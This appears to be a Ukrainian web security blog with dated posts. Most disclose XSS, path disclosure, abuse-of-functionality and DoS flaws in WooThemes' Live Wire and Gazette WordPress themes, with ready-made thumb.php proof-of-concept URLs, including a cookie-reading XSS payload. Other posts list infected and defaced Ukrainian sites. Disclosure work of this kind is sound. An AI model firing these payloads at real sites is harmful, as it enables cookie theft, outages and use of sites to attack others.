Websecurity - Веб безпека

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://umvs-kherson.gov.ua - інфікований державний сайт - інфекція була виявлена 03.04.2011. Зараз сайт входить до переліку підозрілих.
• http://ivaadm.gov.ua - інфікований державний сайт - інфекція була виявлена 18.03.2011. Зараз сайт не входить до переліку підозрілих.
• http://ironmensport.com - інфекція була виявлена 21.03.2011. Зараз сайт входить до переліку підозрілих.
• http://nano.com.ua - інфекція була виявлена 02.04.2011. Зараз сайт не входить до переліку підозрілих.
• http://dorama-teens.at.ua - інфекція була виявлена 26.02.2011. Зараз сайт не входить до переліку підозрілих.

05.02.2011

У лютому, 02.02.2011, я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в темах Live Wire 2.0 та Live Wire Style для WordPress. Це ще дві теми, що разом з Live Wire Edition входять до серії Live Wire. І вони також є комерційними шаблонами для WP від WooThemes. Які я виявив на одному сайті, що їх використовує. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в темі The Gazette Edition для WordPress.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам тем.

12.04.2011

XSS:

http://site/wp-content/themes/livewire/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure:

http://site/wp-content/themes/livewire/thumb.php?src=jpg
http://site/wp-content/themes/livewire/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/livewire/thumb.php?src=http://site/page.png&h=1111111&w=1
http://site/wp-content/themes/livewire/

А також ще 30 php-скриптів шаблону в папці /livewire/ та всіх підпапках.

Abuse of Functionality:

http://site/wp-content/themes/livewire/thumb.php?src=http://site&h=1&w=1

DoS:

http://site/wp-content/themes/livewire/thumb.php?src=http://site/big_file&h=1&w=1

Про подібні AoF та DoS уразливості я писав в статті Використання сайтів для атак на інші сайти.

Окрім папки /livewire/, дані теми також можуть розміщуватися в папках /livewire-dev/ та /livewire-package/ (це пакет, що включає всі три теми Live Wire серії).

Уразливі Live Wire 2.0 та Live Wire Style версія 2.3.1 та попередні версії. XSS можлива лише в старих версіях шаблонів. Після мого попередження, розробник виправив Abuse of Functionality, DoS та деякі FPD, але все ще залишилось багато невиправлених FPD.

Як і в попередні роки, надам свої прогнози розвитку веб безпеки в новому році. Але спочатку зроблю огляд тих прогнозів, що я давав на 2010 рік.

На початку минулого року я зробив свої прогнози стосовно розвитку галузі веб безпеки в минулому році. І зараз я оціню наскільки справдилися мої попередні прогнози.

1. Уразливості XSS в минулому році, як і раніше, все більше поширювалися (вони були найпоширенішими уразливостями веб додатків).
2. Збільшилися випадки витоків важливої інформації.
3. Активно знаходилися та використовувалися уразливості в браузерах для атак на користувачів.
4. Фішинги атаки проводилися достатньо активно на протязі минулого року. Що спонукало популярні сервіси почати більш наполегливо боротися проти фішінга та розповсюдження malware.
5. Значно зросла кількість заражених вірусами веб сторінок в Інтернеті. Зокрема в Уанеті в 2009 я виявив 65 інфікованих сайтів, а в 2010 вже 264 сайти (зростання на 294%).
6. Збільшилися атаки на соціальні мережі, в тому числі на Facebook та Twitter.
7. Значно зросла хакерська активність (зокрема в Уанеті зростання на 460%).

Як видно всі мої попередні прогнози переважно збулися .

А тепер мій прогноз розвитку галузі веб безпеки в 2011 році.

1. Уразливості XSS будуть поширюватися й надалі.
2. Все більше будуть використовуватися уразливості в браузерах та плагінах для атак на користувачів.
3. Збільшиться кількість атак на державні сайти України.
4. Розробники браузерів почнуть більш активно впроваджувати секюріті механізми в свої продукти.
5. Зростання кількості заражених вірусами веб сторінок буде більш активним.
6. Атаки на соціальні мережі продовжать збільшуватися.
7. Продовжиться подальше зростання хакерської активності.

03.02.2011

Учора, 02.02.2011, я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в темі The Gazette Edition для WordPress. Це комерційний шаблон для WP від WooThemes. Які я виявив на одному сайті, що використовує даний шаблон. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в темі Live Wire Edition для WordPress.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам теми.

11.04.2011

XSS:

http://site/wp-content/themes/gazette/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure:

http://site/wp-content/themes/gazette/thumb.php?src=http://site
http://site/wp-content/themes/gazette/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/gazette/thumb.php?src=http://site/page.png&h=1111111&w=1
http://site/wp-content/themes/gazette/

А також ще десятки php-скриптів шаблону в папці /gazette/ та всіх підпапках.

Abuse of Functionality:

http://site/wp-content/themes/gazette/thumb.php?src=http://site&h=1&w=1

DoS:

http://site/wp-content/themes/gazette/thumb.php?src=http://site/big_file&h=1&w=1

Про подібні AoF та DoS уразливості я писав в статті Використання сайтів для атак на інші сайти.

Окрім папки /gazette/ в каталозі з темами, дана тема також може розміщуватися в папці /gazette-dev/gazette/.

Уразливі The Gazette Edition 2.9.4 та попередні версії. XSS можлива лише в старих версіях шаблона. Після мого попередження, розробник виправив Abuse of Functionality, DoS та деякі FPD, але все ще залишилось багато невиправлених FPD.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://chaspik.kiev.ua (хакером SHADOWNET)
• http://coralclub.kharkov.ua (хакером Udara)
• http://moybb.com.ua (хакерам PisstoN) - 06.03.2011, зараз сайт вже виправлений адмінами
• http://www.stroyraboti.com (хакерами RKH)
• http://doktor.kiev.ua (хакером dr.net) - причому спочатку сайт був взломаний 27.01.2011 dr.net, а зараз взломаний Houssem jrad. Схоже, що сайт постійно хакається, як і деякі інші сайти в Уанеті

Нещодавно, 05.04.2011, вишла нова версія WordPress 3.1.1.

WordPress 3.1.1 це секюріті випуск 3.1 серії. В якому розробники зробили майже тридцять виправлень, в тому числі виправили три уразливості.

Це CSRF уразливість в медіа аплоадері, DoS в деяких середовищах через спеціальні лінки в коментарях та XSS уразливість.

01.02.2011

У грудні, 08.12.2008, я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в темі Live Wire Edition для WordPress. Це комерційний шаблон для WP від WooThemes. Які я виявив на одному сайті, що використовує даний шаблон. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в різних шаблонах для WP, зокрема в 2007 році я писав про XSS в темах Blix та Blix Rus для WordPress.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам теми.

08.04.2011

XSS:

http://site/wp-content/themes/livewire-edition/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure:

http://site/wp-content/themes/livewire-edition/thumb.php?src=jpg
http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site/page.png&h=1111111&w=1
http://site/wp-content/themes/livewire-edition/

А також ще 30 php-скриптів шаблону в папці /livewire-edition/ та всіх підпапках.

Abuse of Functionality:

http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site&h=1&w=1

DoS:

http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site/big_file&h=1&w=1

Про подібні AoF та DoS уразливості я писав в статті Використання сайтів для атак на інші сайти.

Окрім папки /livewire-edition/, дана тема також може розміщуватися в папці /livewire-package/ (це пакет, що включає всі три теми Live Wire серії).

Уразливі Live Wire Edition 2.3.1 та попередні версії. XSS можлива лише в старих версіях шаблона. Після мого попередження, розробник виправив Abuse of Functionality, DoS та деякі FPD, але все ще залишилось багато невиправлених FPD.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://search.com.ua - інфекція була виявлена 06.04.2011. Зараз сайт не входить до переліку підозрілих.
• http://day-sity.ho.ua - інфекція була виявлена 26.03.2011. Зараз сайт входить до переліку підозрілих.
• http://kvn.odessa.ua - інфекція була виявлена 30.03.2011. Зараз сайт не входить до переліку підозрілих.
• http://cinemanet.org.ua - інфекція була виявлена 29.03.2011. Зараз сайт входить до переліку підозрілих.
• http://spie.kiev.ua - інфекція була виявлена 27.03.2011. Зараз сайт не входить до переліку підозрілих.

Після попереднього виявлення похаканих сайтів в моїх логах, приведу нову інформацію про взломані українських сайти. Що використовуються для атак (зокрема RFI атак) на інші сайти.

Похакані сайти в Уанеті:

• http://britanka.com.ua (невідомим хакером) - 02.2011

Файли, що використовувалися для RFI атак:

http://britanka.com.ua/id1.txt - файл вже видалений з сайта.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://yalta-gs.gov.ua (хакером kaMtiEz) - 21.03.2011 - взломаний державний сайт, веб сторінка хакерів все ще розміщена на сайті
• http://gamelenta.net (хакерами з RBH-CREW)
• http://newevpa.org (хакерами CWAttacker і Sancakbeyi)
• http://morozok.com.ua (хакером iskorpitx) - 21.03.2011, зараз сайт вже виправлений адмінами
• http://make2web.org.ua (хакером N3xtr0m1x) - 27.03.2011, зараз сайт вже виправлений адмінами